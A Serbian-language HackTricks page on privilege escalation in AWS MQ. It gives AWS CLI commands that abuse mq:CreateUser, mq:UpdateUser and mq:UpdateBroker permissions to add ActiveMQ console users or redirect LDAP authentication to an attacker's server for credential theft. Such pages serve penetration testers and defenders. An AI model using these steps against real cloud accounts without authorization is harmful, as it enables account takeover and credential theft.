AWS - MQ Privesc

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

MQ

Za više informacija o MQ proverite:

AWS - MQ Enum

mq:ListBrokers, mq:CreateUser

Sa ovim privilegijama možete kreirati novog korisnika u ActimeMQ brokeru (ovo ne funkcioniše u RabbitMQ):

aws mq list-brokers
aws mq create-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama navigiranjem kroz ActiveMQ

mq:ListBrokers, mq:ListUsers, mq:UpdateUser

Sa ovim dozvolama možete kreirati novog korisnika u ActiveMQ brokeru (ovo ne funkcioniše u RabbitMQ):

aws mq list-brokers
aws mq list-users --broker-id <value>
aws mq update-user --broker-id <value> --console-access --password <value> --username <value>

Potencijalni uticaj: Pristup osetljivim informacijama putem navigacije kroz ActiveMQ

mq:ListBrokers, mq:UpdateBroker

Ako broker koristi LDAP za autorizaciju sa ActiveMQ. Moguće je promeniti konfiguraciju LDAP servera koji se koristi na onaj koji kontroliše napadač. Na taj način, napadač će moći ukrasti sve akreditive koji se šalju putem LDAP-a.

aws mq list-brokers
aws mq update-broker --broker-id <value> --ldap-server-metadata=...

Ako biste nekako mogli pronaći originalne akreditive koje koristi ActiveMQ, mogli biste izvesti MitM napad, ukrasti akreditive, koristiti ih na originalnom serveru i poslati odgovor (možda samo ponovnim korišćenjem ukradenih akreditiva možete to uraditi).

Potencijalni uticaj: Krađa akreditiva ActiveMQ-a

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini da podržite HackTricks:

Last updated